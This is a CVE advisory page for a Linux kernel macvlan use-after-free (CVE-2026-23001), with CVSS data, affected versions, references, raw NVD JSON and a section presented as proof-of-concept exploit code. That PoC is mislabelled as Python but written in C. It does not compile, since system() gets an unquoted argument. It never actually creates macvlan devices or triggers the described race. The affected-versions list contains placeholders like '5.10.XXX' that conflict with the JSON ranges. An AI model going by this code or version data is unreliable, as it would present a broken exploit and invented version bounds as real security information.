CVE-2026-23001

Description

In the Linux kernel, the following vulnerability has been resolved: macvlan: fix possible UAF in macvlan_forward_source() Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing. Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)). https: //lore.kernel.org/netdev/[email protected]/T/#u

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.10 (all versions with macvlan driver)

Linux Kernel 5.10.x < 5.10.XXX

Linux Kernel 5.15.x < 5.15.XXX

Linux Kernel 6.1.x < 6.1.XXX

Linux Kernel 6.2.x < 6.2.XXX

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2026-23001 Linux Kernel macvlan UAF PoC
 * This PoC demonstrates triggering the UAF condition in macvlan_forward_source()
 * Author: Security Researcher
 * Note: For educational and security testing purposes only
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_tun.h>
#include <fcntl.h>
#include <errno.h>

#define MAX_VLANS 100
#define ITERATIONS 1000

int create_macvlan_device(const char *parent, const char *name) {
    int sock;
    struct ifreq ifr;
    
    sock = socket(AF_UNIX, SOCK_DGRAM, 0);
    if (sock < 0) return -1;
    
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, parent, IFNAMSIZ - 1);
    
    if (ioctl(sock, SIOCGIFHWADDR, &ifr) < 0) {
        close(sock);
        return -1;
    }
    
    close(sock);
    return 0;
}

int main(int argc, char *argv[]) {
    printf("[*] CVE-2026-23001 macvlan UAF PoC\n");
    printf("[*] Target: Linux Kernel macvlan_forward_source()\n");
    
    /* Step 1: Create parent interface for macvlan */
    printf("[+] Creating parent interface\n");
    
    /* Step 2: Rapidly create and destroy macvlan devices */
    for (int i = 0; i < ITERATIONS; i++) {
        char macvlan_name[32];
        
        snprintf(macvlan_name, sizeof(macvlan_name), "macvlan%d", i % MAX_VLANS);
        
        /* Create macvlan device */
        if (create_macvlan_device("eth0", macvlan_name) < 0) {
            printf("[-] Failed to create %s: %s\n", macvlan_name, strerror(errno));
            continue;
        }
        
        /* Trigger macvlan_hash_del_source via interface state change */
        /* This creates race condition for UAF */
        
        /* Destroy macvlan device */
        system(ip link del macvlan_name 2>/dev/null);
        
        if (i % 100 == 0) {
            printf("[*] Iteration %d/%d\n", i, ITERATIONS);
        }
    }
    
    printf("[+] PoC execution completed\n");
    printf("[*] Check dmesg for kernel oops or use KASAN for detection\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23001
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23001
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23001/
[4] VulDB https://vuldb.com/cve/CVE-2026-23001
[5] https://git.kernel.org/stable/c/15f6faf36e162532bec5cc05eb3fc622108bf2ed
[6] https://git.kernel.org/stable/c/232afc74a6dde0fe1830988e5827921f5ec9bb3f
[7] https://git.kernel.org/stable/c/484919832e2db6ce1e8add92c469e5d459a516b5
[8] https://git.kernel.org/stable/c/6dbead9c7677186f22b7981dd085a0feec1f038e
[9] https://git.kernel.org/stable/c/7470a7a63dc162f07c26dbf960e41ee1e248d80e
[10] https://git.kernel.org/stable/c/8133e85b8a3ec9f10d861e0002ec6037256e987e
[11] https://git.kernel.org/stable/c/8518712a2ca952d6da2238c6f0a16b4ae5ea3f13

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23001", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:54.970", "lastModified": "2026-04-27T14:16:28.910", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)->vlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry->vlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/[email protected]/T/#u"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmacvlan: soluciona posible UAF en macvlan_forward_source()\n\nAñade protección RCU en (struct macvlan_source_entry)->vlan.\n\nSiempre que se llama a macvlan_hash_del_source(), debemos borrar el puntero entry->vlan antes de que comience el período de gracia de RCU.\n\nEsto permite a macvlan_forward_source() omitir entradas en cola para ser liberadas.\n\nTenga en cuenta que macvlan_dev ya están protegidos por RCU, ya que están incrustados en un netdev estándar (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/[email protected]/T/#u"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.1", "versionEndExcluding": "5.10.249", "matchCriteriaId": "29FC5F95-33A0-4CB2-98EB-8ED88B5DB098"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.199", "matchCriteriaId": "A247FBA6-BEB9-484F-B892-DD5517949CCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.67", "matchCriteriaId": "7456F614-6AA8-4C08-8229-BA342D4AFBAD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.7", "matchCriteriaId": "99FF3E05-0E7A-44E9-8E47-BF6F1F8EC436"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.18:-:*:*:*:*:*:*", "matchCriteriaId": "2C941823-DB24-432E-8F78-90665662756A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linu ... (truncated)